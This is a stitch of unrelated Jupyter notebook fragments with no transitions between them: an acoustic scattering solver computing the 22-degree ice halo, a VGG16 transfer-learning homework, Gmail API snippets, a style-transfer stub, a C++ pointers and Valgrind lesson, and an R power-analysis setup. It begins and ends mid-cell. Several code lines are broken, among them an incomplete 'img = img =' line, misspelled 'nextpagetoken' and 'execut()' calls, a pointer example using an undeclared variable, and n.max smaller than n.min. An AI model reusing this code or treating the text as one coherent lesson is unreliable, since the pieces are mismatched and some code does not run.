-(\mu(x)^2-1) k^2u^{\text{inc}}(x).$$This tells us that the scattered field is generated by regions in which $\mu(x)\neq 1$, as we should expect. Let us suppose that we have one closed region $V$ in which $\mu(x)\neq 1$. Then it can be shown that the total field $u:=u^{\text{inc}}+u^{\text{sca}}$ satisfies the following volume integral equation:$$ u(x) - k^2\int_{V}G(x,y)(\mu(y)^2-1)u(y)\text{d}y = u^{\text{inc}}(x),$$where $G$ is Green's function:$$ G(x, y) = \frac{i}{4}H_0^{(1)}(k|x-y|), \quad x\neq y, \quad \text{in two dimensions.}$$# Set problem parameters and discretization resolution ko = 32 # wavenumber refInd = 1.31 # refractive index shape = 'hex' # choose shape (hex, circle, ellipse) radius = 1 # radius of shape n_per_lam = 10 # number of points per wavelength angle = 0 # Incident wave angle to x-axis d_inc = np.array([np.cos(angle), np.sin(angle)]) lambda_ext = 2 * np.pi / ko # wavelength # Generate grid points (r), indices of interior points (idx), pixel size (dx), shape vertices (verts), interior wavelength (lambda_int) r, idx, dx, verts, lambda_int = shape_2d(shape, refInd, lambda_ext, radius, n_per_lam) M, N, _ = r.shape # number of voxels in x,y directions (M, N, respectively) 960**2*0.6 # Get Toeplitz operator a = np.sqrt(dx**2 / np.pi) # radius of equivalent area circle toep = get_operator_2d(dx**2, ko, r, a) # Circulant embedding of Toeplitz matrix (required for FFT matvec) opCirc = circulant_embedding(toep, M ,N) # Set up the mu^2-1 matrix, call it MR mu_sq = np.ones((M, N)) mu_sq[idx] = refInd ** 2 MR = mu_sq - 1 # Define matrix-vector product and corresponding linear operator mvp = lambda x: mvp_2d(x, opCirc, idx, MR) A = LinearOperator((M*N, M*N), matvec=mvp) # Construct circulant approximation of Toeplitz matrix in x-direction for preconditioning start = time.time() circ_inv = circulant_preconditioner(toep, M, N, refInd) end = time.time() print('Preconditioner assembly time = ', end - start) # Set up matrix-vector product with circulant preconditioner and establish preconditioner operator mvp_prec = lambda x: mvp_circ_2d(x, circ_inv, M, N, idx) prec = LinearOperator((M*N, M*N), matvec=mvp_prec) # Assemble right-hand side (u_inc). Use a plane wave. u_inc = PlaneWave_2d(1, ko, d_inc, r) # Create an array that equals the incident field inside the scatterer and is zero outside rhs = np.zeros((M, N), dtype=np.complex128) rhs[idx] = u_inc[idx] rhs_vec = rhs.reshape((M*N, 1), order='F') # Perform iterative solve it_count = 0 def iteration_counter(x): global it_count it_count += 1 start = time.time() solp, info = gmres(A, rhs_vec, M=prec, tol=1e-5, callback=iteration_counter) end = time.time() print("The linear system was solved in {0} iterations".format(it_count)) print("Solve time {0} seconds".format(end-start))The linear system was solved in 26 iterations Solve time 0.15004801750183105 secondsEvaluating the field everywhereThe solution we have obtained lives only on the scatterer. In order to evaluate the scattered field (and hence total field) throughout the domain, we can rearrange our original integral equation to give the following representation for the scattered field:$$ u^{\text{sca}}(x) = k^2\int_V G(x, y)(\mu^2(y)-1)u(y)\text{d}y.$$That is, we require one matrix-vector product to compute the scattered field.from vines.operators.acoustic_matvecs import scattered_field # Scattered field u_sca = scattered_field(solp, opCirc, M, N, MR) # Total field u = u_inc + u_sca # Plot the field %matplotlib inline import matplotlib from matplotlib import pyplot as plt from matplotlib.patches import Polygon from matplotlib.collections import PatchCollection matplotlib.rcParams.update({'font.size': 20}) plt.rc('text', usetex=True) plt.rc('font', family='serif') fig = plt.figure(figsize=(8, 5)) ax = fig.gca() plt.imshow(np.real(u.T), extent=[r[0, 0, 0], r[-1, 0, 0], r[0, 0, 1], r[0, -1, 1]], cmap=plt.cm.get_cmap('seismic'), interpolation='bilinear')#'spline16') polygon = Polygon(verts, facecolor="none", edgecolor='black', lw=0.8) plt.gca().add_patch(polygon) plt.xlabel('$x$') plt.ylabel('$y$') plt.colorbar() plt.show()Evaluate over a larger domainWhat if we want to evaluate the field over a region that is larger than the original computation domain, which was the smallest bounding box around the hexagon? This is doable but requires the creation of a new grid and a new (Toeplitz) operator on this grid. For efficiency, it makes sense to ensure that the original grid sits within the new grid and that the pixels are the same size.# First set up variables for the dimensions of bounding-box computational domain wx = r[-1, 0, 0] - r[0, 0, 0] + dx wy = r[0, -1, 1] - r[0, 0, 1] + dx # Create a larger domain for field evaluation # Let's make the new domain the original one previous plus a border or width w_extra w_extra = lambda_ext * 3 # w_extra = 0.5 # Now adjust to make sure pixels of new ones will equal the original ones nn = np.ceil(w_extra / dx) wx_big = 2 * nn * dx + wx wy_big = 2 * nn * dx + wy r_big, M_big, N_big = generatedomain2d(dx, wx_big, wy_big) # Find pixels inside original computation domain idx_eval = (r_big[:, :, 0] > r[0, 0, 0] - dx/2) * \ (r_big[:, :, 0] < r[-1, 0, 0] + dx/2) * \ (r_big[:, :, 1] > r[0, 0, 1] - dx/2) * \ (r_big[:, :, 1] < r[0, -1, 1] + dx/2) # Get Toeplitz operator on new domain toep_big = get_operator_2d(dx**2, ko, r_big, a) # Circulant embedding of Toeplitz matrix opCirc_big = circulant_embedding(toep_big, M_big, N_big) # Next create the refractive index matrix mu_sq_big = np.ones((M_big, N_big)) mu_sq_big[idx_eval] = mu_sq.reshape(M*N, 1)[:, 0] MR_big = mu_sq_big - 1 # Create a new solution matrix that contains the original solution at the correct locations u_sol_big = np.zeros((M_big, N_big), dtype=np.complex128) u_sol = solp.reshape(M, N, order='F') u_sol_big[idx_eval] = u_sol.reshape(M*N, 1)[:, 0] # Evaluate incident field on new grid u_inc_big = PlaneWave_2d(1, ko, d_inc, r_big) # Convert u_sol_big into vector solp_eval = u_sol_big.reshape((M_big*N_big, 1), order='F') # Scattered field u_sca_big = scattered_field(solp_eval, opCirc_big, M_big, N_big, MR_big) # Total field u_big = u_inc_big + u_sca_big matplotlib.rcParams.update({'font.size': 20}) plt.rc('text', usetex=True) plt.rc('font', family='serif') fig = plt.figure(figsize=(16, 10)) ax = fig.gca() # plt.imshow(np.abs(u_big.T), extent=[r_big[0, 0, 0], r_big[-1, 0, 0], r_big[0, 0, 1], r_big[0, -1, 1]], # cmap=plt.cm.get_cmap('viridis'), interpolation='spline16') plt.imshow(np.real(u_big.T), extent=[r_big[0, 0, 0], r_big[-1, 0, 0], r_big[0, 0, 1], r_big[0, -1, 1]], cmap=plt.cm.get_cmap('seismic'), interpolation='none') polygon = Polygon(verts, facecolor="none", edgecolor='black', lw=0.8) plt.gca().add_patch(polygon) plt.axis('off') # fig.savefig('results/hex_k10_pixel.png') # plt.xlabel('$x$') # plt.ylabel('$y$') # plt.colorbar() 2/lambda_ext M_big*N_big, M_big, N_big dx/0.0149 M_big*N_big*50 32000*256Far-field patternFor many applications, it is the far-field pattern that is of primary interest. The scattered field has the asymptotic (large $kr$) behaviour$$ u^s(x) = \frac{e^{ik|x|}}{|x|^{(d-1)/2}}\left(u_{\infty}(\hat{x})+\mathcal{O}\left(\frac{1}{|x|})\right)\right),$$uniformly with respect to $\hat{x}\in\mathcal{S}^{d-1}$, where the *far-field pattern* $u_{\infty}(\cdot)$ is given by$$ u_{\infty}(\hat{x}) = c_d k^2\int_V(\mu(y)^2-1)e^{-ik\hat{x}\cdot y}u(y)\text{d}y,$$with $$ c_d = \begin{cases} \frac{e^{i\pi/4}}{\sqrt{8\pi k}}\ & d=2, \\ \frac{1}{4\pi}\ & d=3. \end{cases}$$def far_field(angle_inc, theta, r, ko, MR, u_sol): # theta = np.linspace(0, 2 * np.pi, n+1) n = len(theta) x_hat = np.array([np.cos(theta+angle_inc), np.sin(theta+angle_inc)]) ffp = np.zeros((n, 1), dtype=np.complex128) for i in range(n): dot_prod = x_hat[0, i] * r[:, :, 0] + x_hat[1, i] * r[:, :, 1] exp = np.exp(-1j * ko * dot_prod) ffp[i] = np.sum(MR * exp * u_sol) c_d = np.exp(1j*np.pi/4) / np.sqrt(8*np.pi*ko) ffp *= c_d return ffp # Evaluate far field in n evenly spaced directions between angles 0 and 180 degrees n = 180 * 2 theta_ffp = np.linspace(0, np.pi, n) ffp = far_field(angle, theta_ffp, r, ko, MR, u_sol) fig = plt.figure(figsize=(10, 7)) ax = fig.gca() plt.plot(theta_ffp[:] * 180 / np.pi, np.abs(ffp[:])) plt.grid('on') plt.autoscale(enable=True, axis='both', tight=True) plt.xlabel('Scattering angle (degrees)') plt.ylabel('$|u_{\infty}|$')Random orientationNow let's consider a hexagon in random orientation. In order to compute the far-field pattern of a randomly-oriented hexagon, we simple average many far-field patterns for different incident wave directions. Owing to the symmetry of the hexagon, we need only consider incident angles between 0 and 60 degrees (actually, 30 degrees would suffice but 0 to 60 is easier to implement).# Discretise (0, 60) degrees uniformly into n_angles angles n_angles = 10 angles = np.linspace(0, np.pi/3, n_angles + 1)For each incident angle we need to solve the linear system with the appropriate right-hand side and then compute the far-field pattern. This means we do not need to reassemble the matrix-operator, but just the right-hand side and then perform the iterative solve.FFP = np.zeros((n_angles, n), dtype=np.complex128) for i_angle in range(n_angles): # Assemble right-hand side d_inc = np.array([np.cos(angles[i_angle]), np.sin(angles[i_angle])]) u_inc = PlaneWave_2d(1, ko, d_inc, r) rhs = np.zeros((M, N), dtype=np.complex128) rhs[idx] = u_inc[idx] rhs_vec = rhs.reshape((M*N, 1), order='F') # Solve linear system it_count = 0 start = time.time() solp, info = gmres(A, rhs_vec, M=prec, tol=1e-4, callback=iteration_counter) end = time.time() print("The linear system was solved in {0} iterations".format(it_count)) print("Solve time {0} seconds".format(end-start)) u_sol = solp.reshape(M, N, order='F') # ffp, theta = far_field(angles[i_angle], n, r, ko, MR, u_sol) ffp = far_field(angles[i_angle], theta_ffp, r, ko, MR, u_sol) FFP[i_angle, :] = ffp[:, 0] # Calculate an averaged far-field pattern ffp_mean = np.sum(FFP, axis=0) / n_angles # Plot the FFP for randomly-oriented hexagon. The 22 degree halo is indicated by the dashed line. fig = plt.figure(figsize=(10, 7)) ax = fig.gca() plt.plot(theta_ffp * 180/np.pi, np.abs(ffp_mean)) plt.vlines(22, 0, np.max(np.abs(ffp_mean)), 'k', 'dashed') plt.grid('on') plt.autoscale(enable=True, axis='both', tight=True) plt.xlabel('Scattering angle (degrees)') plt.ylabel('$|u_{\infty}|$') # Identify the precise angle of the "22 degree" halo # First crop off the first 15 degrees worth of values since they are dominant ffp_crop = ffp_mean[30:] theta_crop = theta_ffp[30:] # Max value index ind_max = np.argmax(np.abs(ffp_crop)) print('Halo is located at ' + str.format('{0:.2f}', theta_crop[ind_max] * 180 / np.pi) + ' degrees.')Halo is located at 21.56 degrees.Using pre-trained NN!conda install -y nomkl > tmp.log import numpy as np import theano import theano.tensor as T import lasagne import cPickle as pickle import os import matplotlib.pyplot as plt %matplotlib inline import scipy from scipy.misc import imread, imsave, imresize from lasagne.utils import floatXModel Zoo* https://github.com/Lasagne/Recipes/tree/master/modelzoo* More models within the community* Pick model, copy init, download weights* Here we proceed with vgg16!wget https://s3.amazonaws.com/lasagne/recipes/pretrained/imagenet/vgg16.pkl # copyright: see http://www.robots.ox.ac.uk/~vgg/research/very_deep/ from lasagne.layers import InputLayer from lasagne.layers import DenseLayer from lasagne.layers import NonlinearityLayer from lasagne.layers import DropoutLayer from lasagne.layers import Pool2DLayer as PoolLayer from lasagne.layers import Conv2DLayer as ConvLayer from lasagne.nonlinearities import softmax def build_model(): net = {} net['input'] = InputLayer((None, 3, 224, 224)) net['conv1_1'] = ConvLayer( net['input'], 64, 3, pad=1, flip_filters=False) net['conv1_2'] = ConvLayer( net['conv1_1'], 64, 3, pad=1, flip_filters=False) net['pool1'] = PoolLayer(net['conv1_2'], 2) net['conv2_1'] = ConvLayer( net['pool1'], 128, 3, pad=1, flip_filters=False) net['conv2_2'] = ConvLayer( net['conv2_1'], 128, 3, pad=1, flip_filters=False) net['pool2'] = PoolLayer(net['conv2_2'], 2) net['conv3_1'] = ConvLayer( net['pool2'], 256, 3, pad=1, flip_filters=False) net['conv3_2'] = ConvLayer( net['conv3_1'], 256, 3, pad=1, flip_filters=False) net['conv3_3'] = ConvLayer( net['conv3_2'], 256, 3, pad=1, flip_filters=False) net['pool3'] = PoolLayer(net['conv3_3'], 2) net['conv4_1'] = ConvLayer( net['pool3'], 512, 3, pad=1, flip_filters=False) net['conv4_2'] = ConvLayer( net['conv4_1'], 512, 3, pad=1, flip_filters=False) net['conv4_3'] = ConvLayer( net['conv4_2'], 512, 3, pad=1, flip_filters=False) net['pool4'] = PoolLayer(net['conv4_3'], 2) net['conv5_1'] = ConvLayer( net['pool4'], 512, 3, pad=1, flip_filters=False) net['conv5_2'] = ConvLayer( net['conv5_1'], 512, 3, pad=1, flip_filters=False) net['conv5_3'] = ConvLayer( net['conv5_2'], 512, 3, pad=1, flip_filters=False) net['pool5'] = PoolLayer(net['conv5_3'], 2) net['fc6'] = DenseLayer(net['pool5'], num_units=4096) net['fc6_dropout'] = DropoutLayer(net['fc6'], p=0.5) net['fc7'] = DenseLayer(net['fc6_dropout'], num_units=4096) net['fc7_dropout'] = DropoutLayer(net['fc7'], p=0.5) net['fc8'] = DenseLayer( net['fc7_dropout'], num_units=1000, nonlinearity=None) net['prob'] = NonlinearityLayer(net['fc8'], softmax) return net #classes' names are stored here classes = pickle.load(open('classes.pkl')) #for example, 10th class is ostrich: print classes[9]You have to implement two functions in the cell below.Preprocess function should take the image with shape (w, h, 3) and transform it into a tensor with shape (1, 3, 224, 224). Without this transformation, vgg19 won't be able to digest input image. Additionally, your preprocessing function have to rearrange channels RGB -> BGR and subtract mean values from every channel.MEAN_VALUES = np.array([104, 117, 123]) IMAGE_W = 224 def preprocess(img): img = img = #convert from [w,h,3 to 1,3,w,h] img = np.transpose(img, (2, 0, 1))[None] return img def deprocess(img): img = img.reshape(img.shape[1:]).transpose((1, 2, 0)) for i in xrange(3): img[:,:, i] += MEAN_VALUES[i] return img[:, :, :: -1].astype(np.uint8) img = (np.random.rand(IMAGE_W, IMAGE_W, 3) * 256).astype(np.uint8) print np.linalg.norm(deprocess(preprocess(img)) - img)If your implementation is correct, the number above will be small, because deprocess function is the inverse of preprocess function Deploy the networknet = build_model() import pickle with open('vgg16.pkl') as f: weights = pickle.load(f) input_image = T.tensor4('input') output = lasagne.layers.get_output(net['prob'], input_image) prob = theano.function([input_image], output)Sanity checkДавайте проверим, что загруженная сеть работает. Для этого мы скормим ей картину альбатроса и проверим, что она правильно его распознаётimg = imread('sample_images/albatross.jpg') plt.imshow(img) plt.show() p = prob(preprocess(img)) labels = p.ravel().argsort()[-1:-6:-1] print 'top-5 classes are:' for l in labels: print '%3f\t%s' % (p.ravel()[l], classes[l].split(',')[0])Grand-quest: Dogs Vs Cats* original competition* https://www.kaggle.com/c/dogs-vs-cats* 25k JPEG images of various size, 2 classes (guess what) Your main objective* In this seminar your goal is to fine-tune a pre-trained model to distinguish between the two rivaling animals* The first step is to just reuse some network layer as features!wget https://www.dropbox.com/s/ae1lq6dsfanse76/dogs_vs_cats.train.zip?dl=1 -O data.zip !unzip data.zip #If link doesn't work: download from https://www.kaggle.com/c/dogs-vs-cats/datafor starters* Train sklearn model, evaluate validation accuracy (should be >80%#extract features from images from tqdm import tqdm from scipy.misc import imresize import os X = [] Y = [] #this may be a tedious process. If so, store the results in some pickle and re-use them. for fname in tqdm(os.listdir('train/')): y = fname.startswith("cat") img = imread("train/"+fname) img = preprocess(imresize(img,(IMAGE_W,IMAGE_W))) features = __load our dakka__![img](https://s-media-cache-ak0.pinimg.com/564x/80/a1/81/80a1817a928744a934a7d32e7c03b242.jpg)from sklearn.ensemble import RandomForestClassifier,ExtraTreesClassifier,GradientBoostingClassifier,AdaBoostClassifier from sklearn.linear_model import LogisticRegression, RidgeClassifier from sklearn.svm import SVC from sklearn.tree import DecisionTreeClassifierMain quest* Get the score improved!* You have to reach __at least 95%__ on the test set. More = better.No methods are illegal: ensembling, data augmentation, NN hacks. Just don't let test data slip into training. Split the raw image data * please do train/validation/test instead of just train/test * reasonable but not optimal split is 20k/2.5k/2.5k or 15k/5k/5k Choose which vgg layers are you going to use * Anything but for prob is okay * Do not forget that vgg16 uses dropout Build a few layers on top of chosen "neck" layers. * a good idea is to just stack more layers inside the same network * alternative: stack on top of get_output Train the newly added layers for some iterations * you can selectively train some weights by only sending them to your optimizer * `lasagne.updates.mysupermegaoptimizer(loss, only_those_weights_i_wanna_train)` * selecting all weights from the head but not below the neck: * `all_params = lasagne.layers.get_all_params(new_output_layer_or_layers,trainable=True)` * `old_params= lasagne.layers.get_all_params(neck_layers,trainable=True)` * `new_params = [w for w in all_params if w not in old_params]` * it's cruicial to monitor the network performance at this and following steps Fine-tune the network body * probably a good idea to SAVE your new network weights now 'cuz it's easy to mess things up. * Moreover, saving weights periodically is a no-nonsense idea * even more cruicial to monitor validation performance * main network body may need a separate, much lower learning rate * since updates are dictionaries, one can just compute union * `updates = {}` * `updates.update(lasagne.updates.how_i_optimize_old_weights())` * `updates.update(lasagne.updates.how_i_optimize_old_weights())` * make sure they do not have overlapping keys. Otherwise, earlier one will be forgotten. * `assert len(updates) == len(old_updates) + len(new_updates)` Grading* 95% accuracy on test yields 10 points* -1 point per 5% less accuracy Some ways to get bonus points* explore other networks from the model zoo* play with architecture* 96%/97%/98%/99%/99.5% test score (screen pls).* data augmentation, prediction-time data augmentation* use any more advanced fine-tuning technique you know/read anywhere* ml hacks that benefit the final scoreprint "I can do it!"Fetch all labels and tags on this accounttry: # Call the Gmail API service = build('gmail', 'v1', credentials=creds) results = service.users().labels().list(userId='me').execute() labels = results.get('labels', []) if not labels: print('No labels found.') else: print('Labels:') for label in labels: print(label['name']) except HttpError as error: # TODO(developer) - Handle errors from gmail API. print(f'An error occurred: {error}')Get unread message IDs in InboxMessages are paginated, thus the iteration codetry: service = build('gmail', 'v1', credentials=creds) results = service.users().messages().list(userId='me', q="in:inbox is:unread").execute() messages = [] if 'messages' in results: messages.extend(results['messages']) while 'nextPageToken' in results: page_token = results['nextpagetoken'] results = service.users().messages().list(userId='me', q="in:inbox is:unread", pageToken=page_token).execut() if 'messages' in results: messages.extend(results['messages']) except HttpError as error: # TODO(developer) - Handle errors from gmail API. print(f'An error occurred: {error}')and their countThis is all I want for my polybar notifierlen(results['messages'])Neural Art Style Transfer Example For example, if this is the image I chose, I would get access to 7 different styles of art inspired from the Starry Night, Monalisa, Scream etc ![Live Code](image/Original.png) And here will be its output ![Live Code](image/one.png)![Live Code](image/two.png)![Live Code](image/three.png)![Live Code](image/four.png)![Live Code](image/five.png)![Live Code](image/six.png)![Live Code](image/seven.png) How to run%%html Pointers Introduction When we declare a variable, such as `int i = 0;`, we are telling the computer to reserve memory for an integer, and set the value of `i` to `0`. In C++, we can have access to the memory address by getting the **reference** of the variable `i`. We can store that memory address in a **pointer**, which we declare with a single `*`:```c++int myVar = 0; // i is a variable that stores the value 0int * myPtr; // myPtr is a variable that will store a pointermyPtr = &i; // now myPtr stores the address of i```Let's look a a simple code to put an example of this.!gedit src/intro_01.cpp !g++ -o intro_01 src/intro_01.cpp !./intro_01You will realize that `iptr` is contains a bunch of numbers and letters like `0x7ffd931218f4`. This is the memory address of `i` in your machine. Let's look at a figure that might help understand. If we thing about the memory addresses as integer numbers as in the picture (101, 102, ..., 201, 202, ...) what is happening is the following. We declare the variable `i`, and it is stored in in the memory address `101`. Then we declare a pointer `iptr`, and this variable is stored in memory address `201`. When we set `i = 3`, the value in memory address `101` is set to `3`. When we set `iptr = &i`, we are setting the value of the pointer to the memory address `101`.![Figure 1](figures/figure1.png) Although a pointer contains a memory address, we can **dereference** the pointer to obtain the value of the memory address that is pointing to by using a single `*`. As an example:```c++int i = 3; // Declare integer variable i and initialize it to 3int * iptr = &i; // Declare integer pointer iptr and initialize it to the memory address of iint j = *iptr; /* Declare integer variable j and set it to the value of * the memory address that iptr is pointing to */```Look at the following code to see what is happening:!gedit src/intro_02.cpp !g++ -o intro_02 src/intro_02.cpp !./intro_02We can also assign pointers so they point to the same address:```c++int i = 3; // Declare integer i and initialize it to 3int * iptr = &i; // Declare integer pointer iptr and initialize it to point to iint * iptr_cp = iptr; // Declare integer pointer iptr_cp and initialize it to point to the same place as iptr``` Let's look at the following piece of code, and guess which is the value of the variables. **DON'T RUN THE CODE YET!!**```c++include int main() { int i = 2; int j = i; int * ptr1 = &i; int * ptr2 = ptr1; // What is the value of *ptr2? std::cout << "*ptr2 = " << *ptr2 << std::endl; i = 3; // What is the value of *ptr2? std::cout << "*ptr2 = " << *ptr2 << std::endl; // What is the value of j? std::cout << "j = " << j << std::endl; *ptr2 = j; // What is the value of *ptr1? std::cout << "*ptr1 = " << *ptr1 << std::endl; // What is the value of i? std::cout << "i = " << i << std::endl; ptr2 = &j; *ptr1 = 5; *ptr2 = *ptr1; // What is the value of i? std::cout << "i = " << i << std::endl; // What is the value of j? std::cout << "j = " << j << std::endl; return 0;}```!g++ -o intro_03 src/intro_03.cpp !./intro_03Pointer properties, memory regions and operators Nullptr There are several operators that are useful and commonly used in C++. The first one we will talk about is the **nullptr**. As you know, we should **ALWAYS** initialize a variable when we declare it, even if is to 0, empty string, null character... Pointers should also be initialized. In C++ versions lower than C++11, it is recommended to initialize them to `0`. What this is doing is to make the pointer to point nowhere. However, in C++11 and up, it is recommended to use `nullptr` to initialize a pointer.!gedit src/nullptr_01.cpp !g++ -std=c++11 -o nullptr_01 src/nullptr_01.cpp !./nullptr_01Note two things. First, the pointer has been initialized to `0`. Second, we need C++11 to use `nullptr`. New and delete We have talked about the scope of variables in previous lessons. Pointers also have a scope. When we declare a pointer, it is valid in that scope, and then is gone. However, with pointers we can reserve memory that will persist even outside the scope with the keyword **new**. That will reserve the memory, and no matter what happens in our code, that memory will be kept reserved. However, everytime we use `new`, we will have to free that memory using the keyword **delete**. This opens a new whole lot of possibilities, but also a whole new lot of problems. What happens if we are in a loop where we reserve memory, but we forget to delete it inside the loop? We will keep filling the RAM memory until we run out of it. Memory problems are the most common and yet the most difficult bugs to get rid of. The code below shows how to use these keywords:```c++int * ptr = nullptr; // Declare an integer pointer and initialize it to nullptrptr = new int; // We reserve the memory for int*ptr = 3; // Assign 3 to the memory address to which the pointer points toint * ptr2 = new int(3) // Do everything in one linedelete ptr; // Frees the memory of ptrdelete ptr2; // Frees the memory of ptr2``` Heap, Stack and Static memory Whenever we declare a variable, the memory is automatically allocated and freed. This memory region is called the **stack**. Whatever we put in the stack, will be automatically deleted once we get out of that scope. However, when we use the `new` and `delete` keywords, we are using memory in the **heap**. The heap must be manually freed, or we will have memory errors. Finally, there is the **static memory** region, where the global variables are defined. The memory is reserved once, and remains in the same address for the entire execution of the program. These global variables are defined with the `static` keyword in front of them, and they should not be modified unless extremely necessary. Look at the code below to see examples:!gedit src/memory_01.cpp !g++ -o memory_01 src/memory_01.cpp !./memory_01The -> operator When we were looking at vectors or strings, we saw that to call a function of the vector class we needed to use `.`, i.e., `string.size()` or `vector.clear()`. We will mostly use pointers for classes, and as we saw in the previous lesson, classes have member variables and functions. If instead of a class we have a pointer to a class, in order to access a member function we need to use `->` instead of `.`. Let's have a look at the following file:!gedit src/operator_01.cpp !g++ -o operator_01 src/operator_01.cpp !./operator_01Memory debugger: Valgrind Finding memory errors can be a pain, specially if the code is long and made of multiple files. Look at the following source file:!gedit src/valgring_01.cpp !g++ -o valgrind_01 src/valgrind_01.cpp !./valgrind_01Seems to run fine, right? However, as you probably noticed, we used `new` without a `delete`. In this case, the program works fine, and does what is supposed to do, but in general, when there is a memory issue, the code will run returning nonsense stuff. Whenever you write a software, it is recommended to run it under **valgrind**. This is a program that looks for memory leaks, and identifies where are they happening. Let's try it:!valgrind ./valgrind_01The output should be something like this:```==54605== Memcheck, a memory error detector==54605== Copyright (C) 2002-2015, and GNU GPL'd, by et al.==54605== Using Valgrind-3.12.0 and LibVEX; rerun with -h for copyright info==54605== Command: ./valgrind_01==54605== *i_ptr = 3==54605== ==54605== HEAP SUMMARY:==54605== in use at exit: 4 bytes in 1 blocks==54605== total heap usage: 1 allocs, 0 frees, 4 bytes allocated==54605== ==54605== LEAK SUMMARY:==54605== definitely lost: 4 bytes in 1 blocks==54605== indirectly lost: 0 bytes in 0 blocks==54605== possibly lost: 0 bytes in 0 blocks==54605== still reachable: 0 bytes in 0 blocks==54605== suppressed: 0 bytes in 0 blocks==54605== Rerun with --leak-check=full to see details of leaked memory==54605== ==54605== For counts of detected and suppressed errors, rerun with: -v==54605== ERROR SUMMARY: 0 errors from 0 contexts (suppressed: 0 from 0)```If you see, there are 0 errors, but it is reporting that we lost 4 bytes (size of integer OH SURPRISE!) in the execution. We can rerun it with the options it recommends to see where is it lost:!valgrind --leak-check=full ./valgrind_01Now it adds these lines:```==88796== 4 bytes in 1 blocks are definitely lost in loss record 1 of 1==88796== at 0x4C2A203: operator new(unsigned long) (vg_replace_malloc.c:334)==88796== by 0x40090F: main (in /home/mrierari/codes/LearnCPP11/lessons/07-pointers/valgrind_01)```It is telling us which function is giving the leak. You can look at more info on the internet about options and other features of valgrind. Allocating and deleting arrays A few lessons ago, we saw how to allocate arrays:```c++double myArray[3]; // Allocates a 3 element array in the memory```We did not care about deleting it, since it was put in the stack. However, we can allocate arrays using `new`:```c++double * myArray = new double[5]; // Allocates a 5 element array in the heap```In order to free the memory allocated, we need to call `delete[]`. This will free the memory of the whole array.```c++delete[] myArray; // Frees the memory of the array```In the same way, we can declare n-D arrays:```c++int ** a = new int*[5]; // Declares an array of integer pointers of size 5 for (int i = 0; i < 5; i++) { a[i] = new int[8]; // For each i, declares an array of pointers of size 8}for (int i = 0; i < 5; i++) { delete[] a[i]; // For each i, deletes the array of pointers of size 8}delete[] a; // Deletes the initial 5 element array``` Project: Linked list Introduction With all what we have seen in the previous 7 lessons, now you are ready to start a small project. It will consist on creating a **linked list** of integers. A linked list is similar to a vector, with the difference that the data is not contiguous in memory. The **nodes** of the list can be anywhere, and each node contains the data and a pointer to the next node in the list. Graphically, it would be something like this:![Figure 2](figures/figure2.png)But why complicating our lives if we have vectors? Well, think about an insertion inside a vector. In order to insert something in the position 50 of a vector with 1000 elements, we need to displace all the elements after 50, and change the data. However, with a linked list, we just need to modify 2 nodes: the previous node and the node we are adding. They can be in different areas of the memory, since we have a pointer that points to the next node, no matter where is it. The figure below illustrates this:![Figure 3](figures/figure3.png)The node that has been colored different is the one we inserted, and we only needed to modify the blue arrows. All the rest of the nodes remain untouched. However, linked lists have a perk, which is that accessing a node requires to go over the entire list til you find that node. However, in vectors, it is faster, since we know that the elements are contiguous in memory. Project assignment Your goal is to create two classes: `MyNode` and `MyLinkedList`. As you can expect, class `MyLinkedList` will handle the allocation and destruction of the nodes. Since we will be jumping from one scope to the other one, the address of the nodes will have to be allocated in the heap with the operator `new`. In order to make your life easier, in the folder `src/project` there are the header files and cpp files of the two classes: `node.h/cpp` and `linkedlist.h/cpp`. The members are declared, but not defined. Your goal is to define them properly in order to pass all the assertions in `main.cpp`. Also, it needs to run the main function without memory leaks, so when we run `valgrind`, it needs to return that all the allocs were freed. You should not touch the `main.cpp` file or any of the header files `node.h` and `linkedlist.cpp`. If you have any question, you can post it on the [group forum](https://groups.google.com/forum/!forum/cpp-workshop-paesanilab), so other people can help and we can keep track of the problems. Good luck!!gedit src/project/node.h !gedit src/project/linkedlist.h !gedit src/project/node.cpp !gedit src/project/linkedlist.cppTo compile, run the cell below:!g++ -std=c++11 -c src/project/node.cpp !g++ -std=c++11 -c src/project/linkedlist.cpp !g++ -std=c++11 -o main src/project/main.cpp linkedlist.o node.oRun the main test:!./mainRun Valgrind:!valgrind ./mainTracker Blocker Proposal Initial Sample Size CalculationsJuly 2019Details are available in the [design document](https://docs.google.com/document/d/1p_TA7IE5-bKPSSwn8r-c_2KJpUfF387udDqnQhE00fY/edit), July 19, 2019options("scipen"=9, "digits"=4) library(dplyr) library(MASS) # contains fitdistr library(ggplot2) # for plotting library(rlang) library(tidyverse) library(viridis) # colorblind safe palettes library(DeclareDesign) library(beepr) ## Installed DeclareDesign 0.13 using the following command: # install.packages("DeclareDesign", dependencies = TRUE, # repos = c("http://R.declaredesign.org", "https://cloud.r-project.org")) ## DOCUMENTATION AT: https://cran.r-project.org/web/packages/DeclareDesign/DeclareDesign.pdf cbPalette <- c("#999999", "#E69F00", "#56B4E9", "#009E73", "#F0E442", "#0072B2", "#D55E00", "#CC79A7") options(repr.plot.width=7, repr.plot.height=3.5) sessionInfo() ## the power-analysis-utils.R source file includes the following methods: # mu.diff.from.mu.irr # betas.logit.from.prob # betas.logit.from.mean # min.diagnosis.power # iterate.for.power # plot.power.results source("../../SOC412/power-analysis-utils.R")Describe the studyIn this study, we examine and compare rates of the following outcome variable:* Control* Tracker Blocker A* Tracker Blocker B* Tracker Blocker CThe outcome is a binary variable of whether any ads about any products were observed. Conduct the Power Analysistracker.block.config.three <- data.frame( pa.label = "tracker.block.config", n.max = 500, n.min = 50, # 30% of seeing ads for one product # with 4 products, there's a 75% chance ctl.rate = 0.75, tracker.a.rate = 0.5, tracker.b.rate = 0.25, tracker.c.rate = 0.0 ) tracker.block.config.two <- data.frame( pa.label = "tracker.block.config", n.max = 100, n.min = 2000, # 30% of seeing ads for one product # with 4 products, there's a 75% chance ctl.rate = 0.75, tracker.a.rate = 0.25, tracker.b.rate = 0.5 ) diagnose.experiment <- function( n.size, cdf, sims.count = 500, bootstrap.sims.count = 500){ design <- declare_population(N = n.size) + declare_potential_outcomes( ANY_AD_Z_0 = rbinom(n.size, 1, cdf$ctl.rate), ANY_AD_Z_1 = rbinom(n.size, 1, cdf$tracker.a.rate), ANY_AD_Z_2 = rbinom(n.size, 1, cdf$tracker.b.rate), ANY_AD_Z_3 = rbinom(n.size, 1, cdf$tracker.c.rate) ) + declare_assignment(num_arms = 4, conditions = c("0","1","2","3")) + declare_estimand(est_ANY_AD_1_0 = cdf$tracker.a.rate - cdf$ctl.rate) + declare_estimand(est_ANY_AD_2_0 = cdf$tracker.b.rate - 